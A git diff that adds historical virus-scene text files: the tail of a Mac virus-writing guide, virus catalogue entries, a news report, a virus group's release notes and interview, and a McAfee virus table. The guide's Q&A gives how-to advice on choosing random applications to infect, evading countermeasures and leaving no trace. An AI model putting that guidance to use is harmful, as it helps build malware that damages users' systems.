+2. Modification dates and times. If you use random selection of files to infect, it becomes rather difficult to find which one got infected. If you know when an infection happened, you can immediately check the modification dates of all files - simply by using the Find� command in System 7's Finder.
+3. Text Files. This could be known as a common-file technique. For testing purposes, use a mechanism that whenever an infection takes place, the virus writes the process and the file names and such into a common file in a common folder somewhere. This way, you can check the text file afterwards and know exactly what your code has done. You need not make the mechanism too elaborate, as it will only be for use in testing.
+4. Backup, Backup, Backup. The thought police are at it again. In these cases, it's all too familiar. A trashed project is no fun.
+
+
+Chapter 8: Conclusion
+
+In short, the devices behind writing a virus are not all that complicated. There are many checks to counterattack, and part of the puzzle itself is no find new ways to get around them. Find back doors. Give the code a personality. Make it try to find the best way around a counterattack if it is able to detect one. Size is no longer a constraint in today's memory-hog world. A virus of near 50k would probably go undetected in modern-day storage, so don't feel constrained in that way. Time should be a consideration, however.
+Make code that is efficient, so that users don't notice a slowdown when it is executed. All in all, your code is your work. Don't let it out of the bag until it works well and clean, and don't forget to leave no trace.
+
+
+Appendix: Questions and Answers
+
+Q: How do you get it to randomly choose an application on the HD to infect?
+
+A: Any file on the hard drive is stored in the directory. This includes documents, applications, system files, and so on. Files are found by using the directory (via the File Manager). If you wanted to choose an application that appeared as though it was a random choice, you can still move through the directory. Files are stored in the directory by an index, just like resources, and you can pick a random index number to check a random file. You can use Quickdraw's Random routine to pull out a number, check that index, and see if that file's type is 'APPL'. If not, simply choose another file. If you've found one, then you've got your random application. Granted that not all hard drives have 65536 files on them, so you may have to tone down the returns from Random, but that's simply mathematics. Note also that there are many small applications on the hard drive as well. TeachText, CompactPro, PrintMonitor, etc. This will also come up in the list of applications along with larger applications like Microsoft Word, Aldus Freehand, and the Finder itself. This method will not choose the System file (it has a type of 'zsys'), and documents, any desk accessories, or extensions/control panels. You can modify the routine to work with other file types as well.
+
+Q: How can I include a bitmap or other separate resource data into my code?
+
+A: You've got to use a little assembly (and disassembly) for this method, but it works wonders (the system's scroll bar CDEF use to use it). Create the resource you want to include in your favorite resource editor to suit your taste. Close the resource and re-open the sucker in hex. Copy all of the hex codes into the clipboard. Go into your development environment and at the very end of your code add a bit of assembly. Use the DC.B or DC.W operands to define a bytes or words (respectively) and re-define the complete resource for each byte or word in the resource (it might take a little bit of re-typing). Give this procedure (which never gets 'called') a name. Now, whenever you want to use this 'resource', simply replace the handle or pointer to the resource with this procedure pointer. There's no need to load anything (the entire code resource is already loaded), and the pointer is always valid. This method also saves you from using the Memory Manager for anything.
+
+
diff --git a/textfiles.com/virus/malmsey.txt b/textfiles.com/virus/malmsey.txt
new file mode 100644
index 00000000..b92eb647
--- /dev/null
+++ b/textfiles.com/virus/malmsey.txt
@@ -0,0 +1,75 @@
+ Virus Name:  Malmsey
+ Aliases:
+ V Status:    Rare
+ Discovered:  October, 1992
+ Symptoms:    .COM files overwritten; programs fail to function properly;
+              file date/time changes
+ Origin:      Canada
+ Eff Length:  495 Bytes
+ Type Code:   ONCK - Overwriting Non-Resident .COM Infector
+ Detection Method:  Novi 1.15a+, F-Prot, VNet, Viruscan V99+, VBuster,
+                    Sweep 2.43a+, IBMAV, AVTK 6.04+, NShld V99+, Sweep/N
+ Removal Instructions:  Delete infected files
+
+ General Comments:
+       The Malmsey virus was received in October, 1992, and was written
+       by a person using the name Lucifer Messiah.  Malmsey is from
+       Canada.  This virus is a non-resident, direct action overwriting
+       virus which infects .COM programs, including COMMAND.COM.  A
+       later version of the virus, Malmsey 2 described below, is a
+       parasitic, non-resident, direct action .EXE infector.
+
+       When a program infected with the Malmsey virus is executed, the
+       Malmsey virus will infect one .COM program located in the current
+       directory, overwriting the first 495 bytes of the host file.  The
+       programs date and time in the DOS disk directory listing will have
+       been updated to the current system date and time when infection
+       occurred.  The following text strings can be found in all Malmsey
+       infected programs:
+
+               "*.COM"
+               "[Malmsey Habitat v. 1.3]"
+               "Warmest Regards to  RABID"
+               "from -- ANARKICK SYSTEMS!"
+
+       Malmsey doesn't appear to do anything besides replicate, though
+       infected programs will be permanently corrupted.
+
+       Known variant(s) of Malmsey are:
+       Malmsey 2: A later version of the Malmsey virus, this variant
+                  infects one .EXE program each time an infected program
+                  is executed.  Infected programs will have a file length
+                  increase of 1,703 to 1,717 bytes with the virus being
+                  located at the end of the file.  The Malmsey 2 virus
+                  will occassionally reinfect previously infected
+                  programs, adding an additional 1,712 bytes with each
+                  reinfection.  The file's date and time in the DOS disk
+                  directory listing will not be altered.  The following
+                  text strings can be found in the viral code in Malmsey 2
+                  infected programs:
+                  "Malmsey Habitat v. 2.0"
+                  "Lucifer Messiah -- ANARKICK SYSTEMS 07-18-"
+                  "Hap   Birthday     !"
+                  Origin:  Canada  October, 1992.
+       Malmsey 3 Beta: A later version of the Malmsey 2 virus, this
+                  variant is a memory resident infector of .COM and .EXE
+                  programs, including COMMAND.COM.  It becomes memory
+                  resident at the top of system memory but below the 640K
+                  DOS boundary, hooking interrupts 3 and 21.  Total system
+                  and available free memory, as indicated by the DOS CHKDSK
+                  program, will have decreased by 2,048 bytes.  Once memory
+                  resident, Malmsey 3 Beta infects .COM and .EXE programs
+                  when executed.  Infected programs will have a file length
+                  increase of 806 bytes with the virus being located at the
+                  end of the file.  The file's date and time in the DOS disk
+                  directory listing will not be altered.  The following
+                  following message may be displayed by the virus when an
+                  infected program is executed:
+                  "Gotcha!
+
+                   [MALMSEY HABITAT v3.�]
+                   Lucifer Messiah -- ANARKICK SYSTEMS"
+                  These text strings are encrypted within the viral code.
+                  Origin:  Canada  March, 1993.
+
+������������������������������������������������������������������������������
diff --git a/textfiles.com/virus/mayhem.txt b/textfiles.com/virus/mayhem.txt
new file mode 100644
index 00000000..9883ff8c
--- /dev/null
+++ b/textfiles.com/virus/mayhem.txt
@@ -0,0 +1,46 @@
+Unauthorised Access UK  0636-708063  10pm-7am  12oo/24oo
+
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+        MAYHEM AT FIRMS PLAGUED BY VIRUS
+                By Philip Braund
+
+        Published in The Mirror newspaper
+                 March 7th 1992
+
+   Transcribed for the H/P world by Phantasm
+ 
+    Call Unauthorised Access +44-636-708063
+             Online 10pm-7am UK time
+
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+DATA was whiped from thousands of computers as
+the Michelangelo virus finally struck yesterday.
+
+  At least 16 British firms were hit by the 
+electronic bug and experts reckoned it affected
+10,000 systems throughout the world.
+
+  Staff at a business in London watched in horror
+at 100 screens went blank. British expert Edward
+Wilding said: "I've never known such a serious
+loss of data due to a virus."
+
+  Files also disappeared in more than 1,000
+computers in 500 South African companies. But
+generally the damage was less than predicted 
+because firms made copies of their data or used 
+special programs to destroy the virus.
+
+  Devised by a mischievous boffin and spread by
+"infected" floppy disks, it was triggered as
+computers clocks ticked into the 517th 
+anniversary of Italian artist Michelangelo's
+birthday.
+
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+Happy birthday Michelangelo...
+
+
\ No newline at end of file
diff --git a/textfiles.com/virus/mbfamily.txt b/textfiles.com/virus/mbfamily.txt
new file mode 100644
index 00000000..aba2b7ca
--- /dev/null
+++ b/textfiles.com/virus/mbfamily.txt
@@ -0,0 +1,157 @@
+
+
+
+The Mayberry Family of Virus by HypoDermic!!!!
+----------------------------------------------
+
+     
+     Legal BS!
+    -----------
+    
+HypoDermic is NOT responsible for any damages directly or
+indirectly caused by the use of these alternative programs and
+code.  These virus were produced for educational puposes only! :>
+These files are not to be distributed without the written consent
+of HypoDermic nor are they to be used in any destructive form!
+
+     Who the Hell is this HypoDermic?
+     --------------------------------
+     
+Good question! Some of you already know me either by my real
+handle or if you are special you know me by my real name (oooh!)
+but for those who have know clue I am a lamer newbie upcoming
+alternative programer with realy no future doing anything else but
+virus programming. Wow! What would my therapist say about that?  I
+make no claims to be good because I am just learning the trade with
+no formal education. But maybe someday (daydreaming...) Ill be in
+one of those k-rad groups, NOT! 
+
+     Kissing Ass Section!
+     --------------------
+This is that section you always see at the end where I am
+supposed to kiss ass to all those who help me out! Yeah right! 
+Well I am gonna tell ya the people who helped me know who they are
+and need not be mentioned publically here except one and THIS IS
+NOT A KISS ASS.....and the winner is MnemoniX for his cool beta of
+Biological Warfare...You wanted some feed back check out these
+files!  I liked it and it is easy to use and pretty moron proof.
+
+     Why THE MAYBERRY FAMILY?
+     ------------------------
+     
+Cause I felt that the AVer world needed another virus family
+:> to keep them busy naming these fucking things. Get a clue and
+go back to the Number Naming scheme and make your life easier
+HeHe!! And someone already did the Adams Family (Deathboy), damn!
+But be sure to watch for other families in the future; such as, The
+Brady Bunch with my favorite the Groovy Marsha Virus, Beaver
+Cleaver Family, The Beverly Hillbilly Family, 90210 (make me vomit),
+Melrose Place, Cosby Family (have to include all ethnic families),
+The Family Ties Family, and any other fucking TV show with a family I
+can think of.  Maybe you AVers may just have to have a Parent Family
+name and call it TV Spoof Virus (TSV!!) maybe Ill copyright that
+parent name hmmmm!!! I should have mentioned that I watch way to much
+TV and not enough time programming. This show is one of the classics
+so I present you with the Mayberry Family.
+
+     How about a quick breakdown of the cast?
+     -----------------------------------------
+     
+This will save some of you "researchers" especially you self
+appointed ones some time which correct me if I am wrong but that
+would be about all of you!
+
+Andy:      Memory resident, COM & EXE infector. Very simple Andy was
+           a example of a fine citizen of Mayberry a role model for
+           us all. Andy hated alternative programmer deep down
+           inside and vowed to lock us up in his maximum security
+           jail. Hehehe. 
+
+Barney:    Non-Resident, COM infector, encryption, anti-trace,
+           directory transversal, with improved Dir stealth. One
+           bullet Barn is a sneaky little devil. I wonder if he
+           ever T-ed up Velmalou?
+
+Opy:       Memory resident, COM infector, anti-trace.  What a little
+           rascal (hey there's another Family for me to create The
+           Little Rascals) that opy was always the loyal son.  I bet
+           Opy wouldn't ever code virus in our times cause his Pa
+           wouldn't allow it. 
+            
+AuntB:     Non-Resident, COM & EXE infector, directory
+           transversal, with improved Dir stealth.  Everone needs an
+           aunt like AuntB to wipe there asses, pack there
+           lunches, and make good 'ol family dinners.  Hmmmm with an
+           aunt like that who needs computes and all this high tech
+           modern crap.
+            
+Floyd:     Non-Resident, EXE infector.  Would you let a Fuck
+           like that cut your hair?
+
+Otis:      Non-Resident, COM & EXE infector, encryption,
+           directory transversal. Be careful this fat sloopy drunk
+           is liable to infect your whole fucking system with one
+           looonnnggg belt of moonshine!
+
+MissCrump: Memory Resident, COM & EXE infector, anti-trace,
+           Dir stealth.  Miss Crump that little vixen, has always
+           turned my crank! I bet she's a go-er! Andy should have
+           tooled her when he had the chance.
+            
+Velmalou:  Non-Resident, COM infector, directory stealth. She was a
+           little too mousey for me but I am sure one of you other
+           perverts thought she was the end all of country women.
+            
+Jethro:    Non-Resident, COM infector, encryption. WAIT a Cotton
+           picking minute he ain't no member of the Mayberry Family,
+           you might say!!! Well Ill tell ya there is a lot of
+           inbreeding happening way down south and you can never be
+           to sure (Andy and him looked alot a like and he was as
+           dumb as GoMer and he let Floyd cut his hair you can tell
+           by the part on the side it is Floyd's trade mark!) We
+           may never know what realy happened by that cement pond???
+           I guess this could be one of those virus that could be
+           considered as part of several families until someone
+           renames it! :>
+            
+Goober:    Memory Resident, COM & EXE infector, encryption,
+           anti-trace, improved Dir Stealth.  Goober falls into the
+           same catagory as Floyd...would you let this fuck fix your
+           car if YES ill sell you my entire virus collection for
+           $100 dollars.  I personally would let him fix my car
+           right after he performs brain surgery on one of my loved
+           one, NOT!!! 
+
+GoMer:     Non-Resident, COM & EXE infector, Dir stealth. Well 
+           Gooolllyyy!!! What a knob! He kinda reminds of a few of
+           the people I know in the virus scene not to point any
+           fingers but you know who you are.
+
+
+ 
+     Well Thats All!!
+     ----------------
+
+ Well I hope I remembered all the Family if I find a few more Ill
+be sure to send them on there way.  You can never tell who is
+truely related to who.  Be Sure to watch for more Lame TV Family
+Virus!!! Some of these scan and some don't some are lame and others
+are lamer. 
+
+
+
+HypoDermic =============>PUT THE NEEDLE IN!!!!
+
+
+
+
+
+P.S. BTW, there is no destructive routines in any of the Mayberry
+     Family! Could you honestly see anyone from the cast causing
+     harm to another person? It would be like someone actually dying
+     on the A-TEAM (hey hey there's another one for me!) 
+
+ 
+P.S.P.S. Hope you enjoyed this Spoof!
+
+ 
diff --git a/textfiles.com/virus/mbinterv.iew b/textfiles.com/virus/mbinterv.iew
new file mode 100644
index 00000000..6ba25017
--- /dev/null
+++ b/textfiles.com/virus/mbinterv.iew
@@ -0,0 +1,296 @@
+Metabolis is an Australian guy. He formed Vlad (Virus Labs and Distribution)
+some while ago. Vlad is ofcos a viruswriting group. This group (vlad) releases
+a magazine. Metabolis duty in Vlad, is pretty much alike my position in IR.
+He organize some things, keep the group releasing things, and code some
+stuff. Metabolis is also a very nice guy. If someone want to get a closer view
+who this guy is, read the vlad magazine's (two issue's relesed..), or get
+on IRC #virus, in where, he spend quite some time.
+
+TU = The Unforgiven
+MB = Metabolis
+
+TU> Gimme a short intruduction of you you are!
+
+MB> Well heh I'm 18, basically I sit at the computer most of my
+    spare time, I don't do much coding.. just enough to keep Qark
+    happy :) hehe.  My job's more the promotional side of things,
+    getting people to grab our magazine etc.  Not much time for
+    hobbies when I'm always trying to get on IRC as much as I can
+    :) but hmm I go to the occasional rave party.. that's pretty
+    cool.  I don't work, at the moment I'm trying to finish a
+    course at college.  Not doing too well since I'm hardly there
+    but hey, I'll get there :).
+
+TU> Any thoughts behind that handle, Metabolis?
+
+MB> The thing I really hate, is thinking up handles.  I've had
+    quite a few over the last few years and I was sort of running
+    out of things to use.  So I just opened my age old box of ZX
+    Spectrum 48k computer games and saw one called Metabolis.  End
+    of story! :)
+
+TU> When did you discovered the world of computers, and why did
+    you start with this expensive shitty hobby?
+
+MB> I've always liked being part of a group, there's a central
+    goal and it gives you something to do, and if you're good at
+    what you do.. there's a slight self satisfaction kick involved.
+    So one time I figured it'd be cool to have a go at this virus
+    business, I wasn't too serious since I could hardly code
+    assembler at all, but heh I did it.  Then one day someone told
+    me I should talk to Qark cos he's into virus stuff too.  I got
+    hold of him and yep, he was pretty good.  From there we set
+    out to make the vlad magazine, we weren't really aiming at
+    such a global scale as what we ended up with.
+
+TU> So.. why did you start creating viruses?
+
+MB> Hmm I wasn't too interested with the coding side of things
+    originally, just the scene and organisation etc.  I wrote the
+    pascal one in vlad#1 because I dunno, I felt I had to
+    contribute something and at the time I knew nothing about
+    assembler.  Then Qark came round and went through a parasitic
+    .COM infector with me and hey presto, I get it now :)  So I
+    guess that was when I had the ability to.  Prodigy 3.0 was an
+    ok virus, not the best but I wasn't really aiming at it being
+    a classic, more for other people as shit as me at it to learn
+    from.  That's one of the things we're all about.
+
+TU> Have you been involved in any other group that Vlad?
+
+MB> Let's just say I've tried many different things, and they
+    always seemed to collapse in my face.  VLAD has been good,
+    there have been no problems, no abuse from anyone :).  We
+    actually have respect from some people which is good.
+
+TU> What's the groups goal?
+
+MB> Our goal really is to teach others how this virus shit is
+    done.. to promote our country :).  erm, I dunno that's about
+    it really.  We'll keep coding/writing until we have no more ideas
+    I guess.  Which should be quite a few more issues yet.
+
+TU> Why did you decided to release a magazine? I mean, you could as well
+    release a package of viruses, etc. if it only was for the viruswriting
+    itself..
+
+MB> Well that's just it you see, originally I couldn't really
+    write much in the way of virus code.  I just knew a fair
+    amount of what went on in the scene etc.  Most of my
+    contributions to the magazine have been articles virus related
+    but not code.  So yeah, a magazine seemed right.  We have
+    things to say so we needed a medium through which we could
+    portray this.
+
+TU> Are you planing to expand?
+
+MB> We did go on a member haul a while back but I think we're
+    pretty much settled now with four.  There are two others that
+    might be joining soon but I think the ranks are full :).  So,
+    nah we're not really looking for anyone to join right now.
+    Might do in the future.. we'll see.
+
+TU> Are you into other things in the underground computing, such as
+    hacking, phreaking, etc? Or are you _solely_ a viruswriting group?
+
+MB> I guess you could say I'm into it, I've read quite a large
+    amount of text files on various things, and have tried a bit
+    of this and that, but nothing serious.  I only bother when it
+    serves a purpose.  No need getting myself in trouble just for
+    the fuck of it :).
+
+TU> How many viruses have you in person written?
+
+MB> Well I'll only count my assembler ones :) erm.. 5 I think,
+    but they're very simple.  Two of them I never bothered
+    releasing (they were overwriting :).  The other three, being
+    Prodigy 3.0, Rod Fewster's Gonads (bwahahaha) and my
+    contribution for the next magazine Overdrive.
+
+TU> Which one was the hardest to write?
+
+MB> Overdrive, my latest was the hardest.  Doing the xor
+    encryption I found a daunting task to begin with, it took me
+    quite some time to get it to work :).  It wasn't that
+    difficult though, but I am at a basic stage still.
+
+TU> What do you think of the term non-destructive virus, or even a GOOD virus?
+
+MB> I think the term non-destructive virus applies to all of
+    VLAD's creations! :)  You won't find any formatting or random
+    sector writes in our code.  hmm I wrote an article on this
+    very question I believe hehehe.  In different people's eyes
+    the word GOOD (when applied to a virus) can mean different
+    things.  Some see just the fact that a virus has appended to a
+    file thus altering it's contents to be BAD.  Whereas I would
+    see this as good since it can most probably be removed if the
+    need arises.
+
+TU> Do you have any sort of company or law-enforcement who are trying
+    bust Vlad?
+
+MB> No, not that I know of. If there was I most probably
+    wouldn't know, not having any "contacts" etc in any law
+    enforcement agencies.  We haven't done anything wrong so there
+    isn't much reason for any law enforcement dudes to be
+    interested in what we're doing.
+
+TU> What's your opinion about making viruswring illegal?
+
+MB> It would be like making any coding illegal, i.e. not
+    possible!  A more underground virus scene (than it already is)
+    perhaps would be a good thing.  It would kill a lot of the
+    lamers that hang around :).
+
+TU> Do you spread your viruses in programs?
+
+MB> Well.. that's just it, if we started doing that we definately
+    would have law enforcement agencies on our tail.  No, we don't
+    bother to release our viruses to the public through any sort
+    of software (except our magazine of course :).  If any
+    infections occur overseas it's the readers, not us heh.  A
+    much safer situation to be in.
+
+TU> What's your opinion about newspaper, and computer-mags writing stuff
+    about the virus scene?
+
+MB> So long as the shit isn't prejudiced or one of these
+    virus=gun and virus author=murderer type article I have no
+    problems with that.  Unfortunately most of the time it is
+    exactly the opposite of how I like it :(
+
+TU> What do you think they, can do to improve the quality of the material
+    published?
+
+MB> First get an understanding of what they're crapping on about,
+    it seems most just talk to the AV ppl, and leave the VX out of
+    it totally.  This sorta makes us look like bad guys and
+    basically a bunch of assholes.  Which is not the case :)
+
+TU> Why do you think most reporters often twist one's words around, cutting
+    quotes and in nearly all possible way, without lying, making us look
+    very bad?
+
+MB> It sucks, nothing else to say about it really.  It's not just
+    the fact that they lie and twist what you say.  Like, say if
+    they told you they wouldn't print your real name etc, they
+    don't.  They print your school/uni, your height, your looks
+    etc etc.  The press are mostly a bunch of wankers :)
+
+TU> Has the scene in any way influented on your real life?
+
+MB> I guess it has, I never used to bother about internet
+    before.  I was just a local modem type person.  Now I try and
+    spend as much time on there (in IRC) as I can!  My phone bill
+    has gone up so you're right about it costing me money hehe.
+
+TU> Does your parents, close relatives, know what you're doing behind
+    the computer?
+
+MB> Yeah, my parents know what I do.
+
+TU> So.. what's their opinion about it?
+
+MB> They don't mind at all so long as I don't get our computers
+    infected :).  They're fairly computer literate.
+
+TU> Whould you feel guilty if one of your viruses made damage to a
+    hospital, or if someone DIED bcos of your virus? For example,
+    knocking down the the server to 911, or something like that?
+
+MB> Hmmm our viruses should just infect and sit there, I guess
+    they might cause destruction somehow but it's pretty
+    unlikely.  If it did, then it would be because of lack of
+    virus security at the hospital or the 911 server!  No foreign
+    disks etc blah blah, that sort of shit.. usually that will fix
+    things up for them.  Sure I'd feel guilty but I don't think my
+    parasitic .COM infectors will do much :)
+
+TU> Do you like, or admire any virusprogrammer?
+
+MB> Sure there are plenty, anyone who has made a worthwhile
+    contribution to the scene.  I admire Talon being the best
+    virus coder in Australia (well that's what I reckon!).  hehe
+    he'd really like to read this now I think.
+
+TU> What do you think it takes to become a respected virus writer?
+
+MB> To become respected, you have to try and do what no one else
+    has done!  I may not have come up with anything brilliant but
+    I did think up a few heurstics dodging methods when I wrote
+    Prodigy 3 (hehe check out face of death/80hex for it :)
+    [* Hrm, only 80hex, which was more or less a trojan.. - TU *]
+    Or if you can't think of anything new, just keep turning out as many
+    (non ripped) viruses as you can!  VCL/G2/PS-MPC/NRGL/IVP hacks
+    get lower than zero respect from me.
+
+TU> What's your opinion about the anti-virus persons?
+
+MB> I find most to be self righteous and arrogant.  They never
+    listen to what virus authors have to say, they just keep
+    maintaining that we're bad and they're good.  Well, it's time
+    to start thinking about who pays their wages :).
+
+TU> which anti-virus product do you prefer?
+
+MB> I like tbav for its heuristics, they are an endless supply of
+    fun to think of how to code around them.  I like f-prot for
+    the lengthy virus names (great for scanning collections with
+    :).  Also AVP has some really good VSUM-like descriptions in
+    it.  They are the only ones I ever bother to execute.
+
+TU> Do you think there ever going to be a av-program able
+    to guarantee 100% safety agains all viruses, worms and trojans
+    for all future?
+
+MB> No, nothing can be 100% there will always be a way.  I'm sure
+    viruses will grow in size to get around these things but still
+    they will always be around.
+
+TU> Do you know/heard of any new virus writing technique
+
+MB> I hear of a lot of things, various stealth things.. but never
+    see any proof.  Our flash bios infector was a new virus, not
+    really in technique just the infection media (had to be said :).
+    Bios and sector level stealth is what I hear about most, quite
+    a few people reckon they've found new methods for this, but
+    like I said, have yet to see anything.
+
+TU> Any advice to people who want's to learn the basic of virus-writing?
+
+MB> Sure, stick to it!  After I learnt how the basics were done,
+    I never bothered to keep on with it.  I'm too lazy really
+    hehe.  Just read as many virus writing guides as you can, they
+    never really helped me but they might someone.  The best thing
+    is for someone to actually sit down with ya and show you how
+    it's done on the spot, I'd been trying to learn for ages and
+    when Qark went through it with me, it was like an instant
+    recognition of all the wrong shit I'd been doing.
+
+TU> Something else you wish to say, but never before have had the opportunity
+    to say?
+
+MB> Not really, I tend to say what I want in our magazine :)
+    although.. here's something I'd like to say in your magazine :)
+    you can email any member of VLAD at these addresses
+    meta@tempest.rhn.orst.edu
+    qark@tempest.rhn.orst.edu
+    darkman@tempest.rhn.orst.edu
+    automag@tempest.rhn.orst.edu
+    and if you don't have our magazines you can grab them at
+    ftp: ftp.netcom.com /pub/bradleym/misc-zines
+    or if you can IRC you can get them from VLADdist (my robot)
+    They should be available on any decent VX BBSs anyway.
+
+TU> Any helloes or goto hell messages? :)
+
+MB> Ah, I know so many people these days.. hello to everyone I
+    know, to those I don't try and get in touch with me :).
+    Always happy to hear comments/suggestions from people.  (no
+    abuse mail please :).  As to goto hell messages.. well, hmm I
+    can think of a few, but I'll hold back I think .. don't need
+    any wars starting now do we hehe.
+
+TU> Well, that's it Metabolis..  thanks for your time.
+    (typing /exit.. :) )
+--------------------------------------------------------------------------------
diff --git a/textfiles.com/virus/mcaffvirus.txt b/textfiles.com/virus/mcaffvirus.txt
new file mode 100644
index 00000000..f42665c9
--- /dev/null
+++ b/textfiles.com/virus/mcaffvirus.txt
@@ -0,0 +1,118 @@
+
+
+            VIRUS CHARACTERISTICS LIST  V56
+                                 Copyright 1989, McAfee Associates
+                                                 408 988 3832
+
+	The following list outlines the critical characteristics of the known
+IBM PC and compatible viruses.  
+
+==========================================================================
+
+Infects Fixed Disk Partition Table-------------------+
+Infects Fixed Disk Boot Sector---------------------+ |
+Infects Floppy Diskette Boot --------------------+ | |
+Infects Overlay Files--------------------------+ | | |
+Infects EXE Files----------------------------+ | | | |
+Infects COM files--------------------------+ | | | | |
+Infects COMMAND.COM----------------------+ | | | | | |
+Virus Remains Resident-----------------+ | | | | | | |
+Virus Uses Self-Encryption-----------+ | | | | | | | |
+                                     | | | | | | | | |
+                                     | | | | | | | | |  Increase in
+                                     | | | | | | | | |   Infected
+                                     | | | | | | | | |   Program's
+                                     | | | | | | | | |     Size
+                                     | | | | | | | | |      |
+                                     | | | | | | | | |      |
+Virus               Disinfector      V V V V V V V V V      V        Damage
+-----------------------------------------------------------------------------
+Taiwan                 CleanUp       . . . x . . . . .     708       p
+Chaos                  MDISK         . x . . . . x x .     N/A       B,O,D,F  
+Virus-90               CleanUp       . x . x . . . . .     857       P
+Oropax                 CleanUp       . x . x . . . . .    2773       P,O
+4096                   CleanUp       . x x x x x . . .    4096       D,O,P,L
+Devil's Dance          CleanUp       . x . x . . . . .     941       D,O,P,L
+Amstrad                CleanUp       . . . x . . . . .     847       P
+Payday                 CleanUp       . x . x x x . . .    1808       P
+Datacrime II-B         CleanUp       x . x x x . . . .    1917       P,F
+Sylvia/Holland         CleanUp       . x . x . . . . .    1332       p     
+Do-Nothing             CleanUp       . . . x . . . . .     608       p 
+Sunday                 CleanUp       . x . x x x . . .    1636       O,P
+Lisbon                 CleanUp       . . . x . . . . .     648       P
+Typo/Fumble            CleanUp       . x . x . . . . .     867       O,P
+Dbase                  CleanUp       . x . x . . . . .    1864       D,O,P 
+Ghost Boot Version     MDISK         . x . . . . x x .     N/A       B,O
+Ghost COM Version      CleanUp       . . . x . . . . .    2351       B,P 
+New Jerusalem          CleanUp       . x . x x x . . .    1808       O,P
+Alabama                CleanUp       . x . . x . . . .    1560       O,P,L 
+Yankee Doodle          CleanUp       . x . x x . . . .    2885       O,P 
+2930                   CleanUp       . x . x x . . . .    2930       P
+Ashar                  CleanUp       . x . . . . x . .     N/A       B
+AIDS                   CleanUp       . . . x . . . . .    Overwrites Program 
+Disk Killer            CleanUp       . x . . . . x x .     N/A     B,O,P,D,F
+1536/Zero Bug          CleanUp       . x . x . . . . .    1536       O,P
+MIX1                   CleanUp       . x . . x . . . .    1618       O,P
+Dark Avenger           CleanUp       . x x x x x . . .    1800       O,P,L
+3551/Syslock           CleanUp       x . . x x . . . .    3551       P,D   
+VACSINA                CleanUp       . x . x x x . . .    1206       O,P
+Ohio                   MDISK         . x . . . . x . .     N/A       B
+Typo (Boot Virus)      MDISK         . x . . . . x x .     N/A       O,B
+Swap/Israeli Boot      MDISK         . x . . . . x . .     N/A       B 
+1514/Datacrime II      CleanUp       x . . x x . . . .    1514       P,F
+Icelandic II           CleanUp       . x . . x . . . .     661       O,P
+Pentagon               MDISK         . . . . . . x . .     N/A       B
+3066/Traceback         M-3066        . x . x x . . . .    3066       P
+1168/Datacrime-B       CleanUp       x . . x . . . . .    1168       P,F
+Icelandic              CleanUp       . x . . x . . . .     642       O,P
+Saratoga               CleanUp       . x . . x . . . .     632       O,P
+405                    CleanUp       . . . x . . . . .    Overwrites Program
+1704 Format            CleanUp       x x . x . . . . .    1704       O,P,F
+Fu Manchu              CleanUp       . x . x x x . . .    2086       O,P
+1280/Datacrime         CleanUp       x . . x . . . . .    1280       P,F
+1701/Cascade           CleanUp       x x . x . . . . .    1701       O,P
+1704/CASCADE-B         CleanUp       x x . x . . . . .    1704       O,P
+Stoned/Marijuana       CleanUp       . x . . . . x . x     N/A       O,B,L
+1704/CASCADE           CleanUp       x x . x . . . . .    1704       O,P
+Ping Pong-B            CleanUp       . x . . . . x x .     N/A       O,B
+Den Zuk                MDISK         . x . . . . x . .     N/A       O,B
+Ping Pong              CleanUp       . x . . . . x . .     N/A       O,B
+Vienna-B               CleanUp       . . . x . . . . .     648       P
+Lehigh                 CleanUp       . x x . . . . . .  Overwrites   P,F 
+Vienna/648             M-VIENNA      . . . x . . . . .     648       P
+Jerusalem-B            CleanUp       . x . x x x . . .    1808       O,P
+Yale/Alameda           CleanUp       . x . . . . x . .     N/A       B
+Friday 13th COM        CleanUp       . . . x . . . . .     512       P
+Jerusalem              CleanUp       . x . x x x . . .    1808       O,P
+SURIV03                CleanUp       . x . x x x . . .               O,P   
+SURIV02                CleanUp       . x . . x . . . .    1488       O,P
+SURIV01                CleanUp       . x . x . . . . .     897       O,P
+Pakistani Brain        CleanUp       . x . . . . x . .     N/A       B
+
+
+Legend:
+
+Damage Fields -	B - Corrupts or overwrites Boot Sector
+				O - Affects system run-time operation
+				P - Corrupts program or overlay files
+				D - Corrupts data files
+				F - Formats or erases all/part of disk
+				L - Directly or indirectly corrupts file linkage
+
+Size Increase -	The length, in bytes, by which an infected
+               	program or overlay file will increase
+
+Characteristics - x - Yes
+                  . - No
+
+Disinfectors -	SCAN/D 	 - VIRUSCAN with /D option
+             	SCAN/D/A	 - VIRUSCAN with /D and /A options
+             	MDISK/P	 - MDISK with "P" option
+              	All Others - The name of disinfecting program
+           Note:
+                  The SCAN /D option will overwrite and then delete the
+                  entire infected program.  The program must then be
+                  replaced from the original program diskette.  If you wish
+                  to try and recover an infected program, then use the
+                  named disinfector if available.
+[3] Tfiles: (1-8,?,Q) : 
\ No newline at end of file
diff --git a/textfiles.com/virus/mdef.inf b/textfiles.com/virus/mdef.inf
new file mode 100644
index 0000000000000000000000000000000000000000..3f65696e1cb98466a387b8ba5d061f8db1b691a7
GIT binary patch
literal 4864
zcmb_gO>Y}F5barj{==XFV!M!4f5`bzkb@h=t%|rUDz`z8)Gk-cdY4>~Tq`R2<NIc~
zyO!J(?V&ydwnPqxGjHB|3=w_QRH_F}xsE!EI;U-^A}wjHE2HswboiANS-quOl^Gjd
zDCxoYHcW}`N)yr_lqt(Ay)Lx(h=YwPP%JgwF5cge^YpFqh0#@>HcY6%XI`t|EU&|<
zTT@ktk-1t^R%zuq3%A8N%cGha6@sxFQk9c`tF&pE@_*3YAbL(}?b;~k_DQZdUga`X
z;mGPfkn)<g&fjx1XQ^mC()6UPs&>JI34Y5_f-W5j+UC48sJf|iAXgy#aBti*@B#9v
zCaa=x2!t5XoJtC$KQ-FNFddKRpk!V*mC6v2tF+pMsB0=rrH_JyLG`6{UI*9u3^|)v
zcCF|?n_y*)Tlcj^tz-|<Qz&k?QL2lN8s%f3D4L0LYHeHEXsf;CO+m7d&f-emYz*J!
zFb$5~Ae6ST+ToC>j717-lzn3!w8hnFx!`lIE?>TSBex6fIz$uO$O!4ODm#2w=W862
